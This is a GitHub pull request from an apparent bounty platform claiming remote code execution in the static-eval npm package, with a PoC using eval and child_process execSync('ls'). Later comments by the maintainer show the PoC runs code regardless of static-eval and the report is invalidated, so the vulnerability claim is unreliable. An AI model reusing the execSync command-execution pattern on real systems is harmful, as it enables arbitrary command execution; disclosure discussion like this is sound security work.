Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Remote Code Execution (RCE) in static-eval #1883

Merged
merged 2 commits into from
Feb 13, 2021
Merged

Remote Code Execution (RCE) in static-eval #1883

merged 2 commits into from
Feb 13, 2021

Conversation

gkmr507
Copy link
Contributor

@gkmr507 gkmr507 commented Feb 13, 2021

✍️ Description

Remote Code Execution (RCE) in static-eval.

🕵️‍♂️ Proof of Concept

  1. Create the following PoC file:
// poc.js
var evaluate = require('static-eval');
var parse = require('esprima').parse;

var src=(function (x) { return `${eval("console.log(global.process.mainModule.constructor._load('child_process').execSync('ls').toString())")}` })()
var ast = parse(src).body[0].expression;
evaluate(ast)
  1. Execute the following commands in terminal:
npm i static-eval # Install affected module
node poc.js #  Run the PoC
  1. Check the Output using ls command before and after the execution.

💥 Impact

It may lead to Information Disclosure/DoS/RCE.

✅ Checklist

In my pull request, I have:

  • Created and populated the README.md and vulnerability.json files
  • Provided the repository URL and any applicable permalinks
  • Defined all the applicable weaknesses (CWEs)
  • Proposed the CVSS vector items i.e. User Interaction, Attack Complexity
  • Checked that the vulnerability affects the latest version of the package released
  • Checked that a fix does not currently exist that remediates this vulnerability
  • Complied with all applicable laws

@github-actions github-actions bot added automerge disclosure Vulnerability disclosure labels Feb 13, 2021
@JamieSlome JamieSlome merged commit 9281a2c into 418sec:staging Feb 13, 2021
@d3m0n-r00t
Copy link
Contributor

Hi @hethvik,
I was trying to fix this bug, and that's when I saw that the poc actually doesnot show any bug in static-eval. The injection happens even before it is passed to the static-eval module. I am not sure about the vulnerability you explained but I think the POC is not valid here.
Screenshot 2021-02-17 134725
As you can see in the screenshot the ls gets executed even before it is passed to the evaluate or even parse in this case.
Please do comment if I am wrong. But I think this is not a vulnerability of static-eval.
@JamieSlome please share your view too.

@JamieSlome
Copy link
Contributor

@goto-bus-stop - would be great to get your thoughts here.

Cheers! 🍰

@goto-bus-stop
Copy link

goto-bus-stop commented Feb 17, 2021
edited
Loading

Yes, the POC just straight up executes code regardless of static-eval.

Even if this did involve static-eval, we mention in the documentation that cases like this are basically expected and that static-eval should only be used with trusted input: https://github.com/browserify/static-eval#security

Hence I would consider a problem like this to be a security problem in the application, not in static-eval.

@JamieSlome
Copy link
Contributor

JamieSlome commented Feb 17, 2021
edited
Loading

@goto-bus-stop - awesome, thanks for the heads up! 🍰

I will invalidate the bounty from the platform now...

@goto-bus-stop goto-bus-stop mentioned this pull request Feb 17, 2021
Open
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees
No one assigned
Labels
automerge disclosure Vulnerability disclosure
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
4 participants
@gkmr507 @d3m0n-r00t @JamieSlome @goto-bus-stop